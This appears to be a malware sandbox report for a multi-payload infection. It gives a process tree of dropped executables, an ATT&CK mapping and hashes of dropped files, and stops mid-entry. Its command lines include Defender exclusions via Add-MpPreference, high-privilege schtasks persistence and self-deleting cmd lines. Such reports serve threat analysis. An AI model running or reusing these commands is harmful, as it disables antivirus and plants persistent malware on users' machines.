PID:200

C:\Users\Admin\AppData\Local\Temp\lHxisYyn.exe
"C:\Users\Admin\AppData\Local\Temp\lHxisYyn.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4616

C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4380

C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe
"C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"
2⤵
- Executes dropped EXE
PID:1524

C:\Users\Admin\AppData\Local\Temp\a\wininit.exe
"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1528

C:\Users\Admin\AppData\Local\directory\word.exe
"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
3⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1416

C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
4⤵
PID:1352

C:\Users\Admin\AppData\Local\directory\word.exe
"C:\Users\Admin\AppData\Local\directory\word.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3324

C:\Windows\SysWOW64\svchost.exe
"C:\Users\Admin\AppData\Local\directory\word.exe"
5⤵
PID:568

C:\Users\Admin\AppData\Local\Temp\a\1234.exe
"C:\Users\Admin\AppData\Local\Temp\a\1234.exe"
2⤵
- Executes dropped EXE
PID:1996

C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4932

C:\Users\Admin\AppData\Local\Temp\u3t0.0.exe
"C:\Users\Admin\AppData\Local\Temp\u3t0.0.exe"
3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3300

C:\Users\Admin\AppData\Local\Temp\u3t0.1.exe
"C:\Users\Admin\AppData\Local\Temp\u3t0.1.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1728

C:\Users\Admin\AppData\Local\Temp\a\test2.exe
"C:\Users\Admin\AppData\Local\Temp\a\test2.exe"
2⤵
- Executes dropped EXE
PID:4832

C:\Users\Admin\AppData\Local\Temp\a\1111.exe
"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"
2⤵
- Executes dropped EXE
PID:2672

C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"
2⤵
- Executes dropped EXE
PID:5104

C:\Users\Admin\AppData\Local\Temp\a\Tester.exe
"C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4724

C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2820

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"
3⤵
- Creates scheduled task(s)
PID:2056

C:\Users\Admin\AppData\Local\Temp\a\555.exe
"C:\Users\Admin\AppData\Local\Temp\a\555.exe"
2⤵
- Executes dropped EXE
PID:5064

C:\Users\Admin\AppData\Local\Temp\a\Document.exe
"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
3⤵
PID:1672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
3⤵
PID:1508

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC994.tmp"
3⤵
- Creates scheduled task(s)
PID:5056

C:\Users\Admin\AppData\Local\Temp\a\Document.exe
"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
3⤵
- Executes dropped EXE
PID:4820

C:\Users\Admin\AppData\Local\Temp\a\Document.exe
"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"
3⤵
- Executes dropped EXE
PID:4372

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit
4⤵
PID:5468

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'
5⤵
- Creates scheduled task(s)
PID:5652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpE450.tmp.bat""
4⤵
PID:5488

C:\Windows\SysWOW64\timeout.exe
timeout 3
5⤵
- Delays execution with timeout.exe
PID:5712

C:\Users\Admin\AppData\Roaming\msdtc.exe
"C:\Users\Admin\AppData\Roaming\msdtc.exe"
5⤵
- Executes dropped EXE
PID:5980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"
6⤵
PID:5460

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"
6⤵
PID:3252

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp57DA.tmp"
6⤵
- Creates scheduled task(s)
PID:5524

C:\Users\Admin\AppData\Roaming\msdtc.exe
"C:\Users\Admin\AppData\Roaming\msdtc.exe"
6⤵
PID:5572

C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe
"C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BrawlB0t.exe'
3⤵
PID:4304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
3⤵
PID:2128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
3⤵
PID:6108

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
3⤵
- Creates scheduled task(s)
PID:2296

C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe
"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:280

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4752

C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe
"C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe"
2⤵
- Executes dropped EXE
PID:3320

C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"
2⤵
- Executes dropped EXE
PID:2724

C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe
"C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Modifies system certificate store
PID:1080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3748 -s 764
3⤵
- Program crash
PID:2204

C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe
"C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"
2⤵
- Executes dropped EXE
PID:5956

C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"
2⤵
PID:5224

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
3⤵
PID:668

C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe"
2⤵
PID:5424

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5584

C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
4⤵
PID:5868

C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
4⤵
PID:5888

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
4⤵
PID:348

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:3224

C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe
"C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"
2⤵
PID:5648

C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe
"C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"
2⤵
PID:5536

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe
3⤵
PID:5924

C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
4⤵
- Runs ping.exe
PID:5340

C:\Users\Admin\AppData\Local\Temp\a\1111.exe
"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"
2⤵
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 148
3⤵
- Program crash
PID:5408

C:\Users\Admin\AppData\Local\Temp\a\new1.exe
"C:\Users\Admin\AppData\Local\Temp\a\new1.exe"
2⤵
PID:5660

C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe
"C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"
2⤵
PID:2132

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6056

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4476

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6112

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6096

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6064

C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"
2⤵
PID:5708

C:\Users\Admin\AppData\Local\Temp\u4ek.0.exe
"C:\Users\Admin\AppData\Local\Temp\u4ek.0.exe"
3⤵
PID:5508

C:\Users\Admin\AppData\Local\Temp\u4ek.1.exe
"C:\Users\Admin\AppData\Local\Temp\u4ek.1.exe"
3⤵
PID:4760

C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe
"C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"
2⤵
PID:5644

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
3⤵
PID:5368

C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"
2⤵
PID:5360

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 772
3⤵
- Program crash
PID:5540

C:\Users\Admin\AppData\Local\Temp\a\june.exe
"C:\Users\Admin\AppData\Local\Temp\a\june.exe"
2⤵
PID:5288

C:\Users\Admin\AppData\Local\Temp\is-MO662.tmp\june.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MO662.tmp\june.tmp" /SL5="$50264,4053053,54272,C:\Users\Admin\AppData\Local\Temp\a\june.exe"
3⤵
PID:5440

C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe
"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -i
4⤵
PID:5632

C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe
"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -s
4⤵
PID:2736

C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"
2⤵
PID:4124

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 764
3⤵
- Program crash
PID:5676

C:\Users\Admin\AppData\Local\Temp\a\new.exe
"C:\Users\Admin\AppData\Local\Temp\a\new.exe"
2⤵
PID:5008

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5728

C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe
"C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"
2⤵
PID:5072

C:\Users\Admin\AppData\Local\Temp\a\123p.exe
"C:\Users\Admin\AppData\Local\Temp\a\123p.exe"
2⤵
PID:2296

C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe
"C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"
2⤵
PID:5480

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"
3⤵
PID:3332

C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"
2⤵
PID:996

C:\Users\Admin\AppData\Local\Temp\uro.0.exe
"C:\Users\Admin\AppData\Local\Temp\uro.0.exe"
3⤵
PID:364

C:\Users\Admin\AppData\Local\Temp\uro.1.exe
"C:\Users\Admin\AppData\Local\Temp\uro.1.exe"
3⤵
PID:3264

C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe
"C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"
2⤵
PID:1560

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
3⤵
PID:5364

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
3⤵
PID:5272

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
3⤵
PID:6032

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
4⤵
- Creates scheduled task(s)
PID:5400

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
3⤵
PID:5396

C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe
"C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"
2⤵
PID:3876

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:2164

C:\Users\Admin\AppData\Local\Temp\a\crypt.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"
2⤵
PID:1348

C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
3⤵
PID:492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
4⤵
PID:5080

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5468

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Windows\svchost.exe
C:\Windows\svchost.exe
1⤵
- Executes dropped EXE
PID:1356

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:5024

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
1⤵
PID:5580

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
2⤵
PID:4344

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3aff055 /state1:0x41c64e6d
1⤵
PID:5908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Scripting

T1064

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe

Filesize
444KB

MD5
2d2ca48b8c09de0645b7fd0223c922f0

SHA1
de1f948065d612cd649564e466e362198f8ce3e6

SHA256
72e63f73ced48b29f196e48030215273a17f7827c310f2747321cbc1f388c206

SHA512
452f545f1f4d834a2cd92910fe5caa8c0f2ffdbaf2b3a0370c17f953422d37c13e10212219cae04fad93d07e81f370010a1951b29f2e83f78694ed68637d27bb

Download Submit
C:\ProgramData\HIIIECAA

Filesize
92KB

MD5
da89a93663ee51bf2303b11ab8cd8a3e

SHA1
1e60b798570c9c85b7163b7d6491e9af68eef7ce

SHA256
0ba211c75db7dd3a8837bcb806e38070b86592e4d0db1e1a6d989985e146cacb

SHA512
7d2e4257a52bae57f70c2987b2f9e74a736262cd6813064af0f80ed626b9ac8d2d5db8b3b91854ad220139033aed89bf3edef28ffdc157aa12e0aae3f19a1571

Download Submit
C:\ProgramData\MediaDevicePicker 3.0.194.66\MediaDevicePicker 3.0.194.66.exe

Filesize
2.9MB

MD5
af11c34e790a03677c43339fc82d0260

SHA1
cd6fb90b47ff1f10d4e8ea3ad14e782dbdaa068c

SHA256
2daf226107c856b1ecf9399684411b3549510db9744fb3c5a1aa51e11f5af505

SHA512
64cd1fa602bf98deba05e89a2d489f4baf7328bd36ed59b1a342630e0f05db1b9490db615a4ed3db07e6456f8b1ce18a51a095bd318ddaa0c6ba719a97c265d4

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
573d77d4e77a445f5db769812a0be865

SHA1
7473d15ef2d3c6894edefd472f411c8e3209a99c

SHA256
5ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c

SHA512
af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
d028bfc5cee2c95f8da79e7967507f53

SHA1
c006c186889f79408592c75a8a1365de7a419313

SHA256
5eb72589802811c55a0c02d5c483625bf6b4f7122594110ff15c374e0b6df890

SHA512
f83d2a6241f36b2a1da32b7fbb4df46d98befb9b5692f61f9382be48e0311a6a5df6c131c49d1081db381dbc289fc77c5bdf2b973db87b7e6e6688d7781784f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
34cbce7a86066983ddec1c5c7316fa24

SHA1
a1135a1ddbfd3ae8079f7e449d7978fdb92f3bd9

SHA256
23bf6d99f757f6728c8c896676b0707e190e1acb80ec8758696fa3efa8d6cb42

SHA512
f6537a61341ef316200de61d4185d7fdf8169fa5f01446241d34dc74ffdf9edfd520c5d06d54c9df8a8d1eb0eeab53141d75c88f157b72cbcb6b7f0bdb84e769

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
65e1cae25c4ecbff02b886d71798b523

SHA1
6e23e93da47fecce5769e801e39fedb64b278160

SHA256
d7395fa2abc54e8cc11b7f89cf245e90d09870a3642831f1ffd0e30c6b89b23b

SHA512
109fb079c0b36b8be2b069e4b9ecf1810420ac20b54f3d61a03e1084bcf5cc3ca644f7fd2038f65fa50f4d24ee263a33c4abf4daaa2078745407617c94d48e74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
8b8044e4e5c5ce4b1542c2ebc69f9181

SHA1
a14e1d85499e06947ba3964ff0c7f014c38b86fe

SHA256
cd6a833a498729c56c8d940a7944e33d079b58a1caa2ad445f2acd033fcda235

SHA512
7bde15346984f121662fcd63361d4c916ee702d0dff2aaac554343c24acd2bc0f78f3e10469d8e8757a4860d49ef3f4f91f8f6ece74f8773d5ddfabd4a405c5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cc13407d6478337f5c669d73c8632749

SHA1
2fba3f0e176a63e225a6f8633daecbe871b47a40

SHA256
05bb2cedb04c554489395f46750ce64b0e05bfabc02c63cd68652ea85da25a3b

SHA512
d238df0ecff9a120518c3fc02a739e215f6145fc9c3502d9086c3f8d89ff78e6926d9237ff9f7177a4b2355845e055836fbf451a82a631b8aab10b0909327dd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
612f3c6c1f251baf0aa339d99ef88abc

SHA1
d86f577c8bd08f05cb5aec42c88dc3a86ee2e6e1

SHA256
3c9aed792d5d087d943c3d1ba812416989fdfb3be5cd7382a12141880856c43a

SHA512
51688a0902bb3544538a9b7a57868bffb934e13c7208c37e07bff2c8774282ab42efb6b66a2ee18c2b7b016a9b9850e0e4263ce470705522f3c007fa7b744c4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
510d161eea8fcba9a78ee5bf939c8086

SHA1
19c764b0030e52afef556d4e94c27b9425bb8f5e

SHA256
8b3b2f79700f8b810ded0608a3c96f46731521f064dd0518d14fb41799dc3884

SHA512
2cfd8a715244fac798f2a3d2d939454c41bde6ece265e3da054508022039ba88cce78008c4129ca4e6939fa47d4b52bdc504bb55f747640fcf0eb5d6d4253378

Download Submit
C:\Users\Admin\AppData\Local\RuntimeBroker2.exe

Filesize
837KB

MD5
3ecf5cab8e919a5bb0c047bd80e5dfee

SHA1
4abdb1574cec441b1efdea63f1a30b3318bad32e

SHA256
c69fa2eab697e81ab16220fb7cff13f1feed69bb84a9df039920501eb699c7bc

SHA512
3b871383921202e1a06c55ad1774b7403be754fc1e567260867f14e4f2ccc31a9bf6deb9ac22837277cea395f31db7213155318a96beb249e171ec186d25c15f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cwzsq.tmpdb

Filesize
148KB

MD5
90a1d4b55edf36fa8b4cc6974ed7d4c4

SHA1
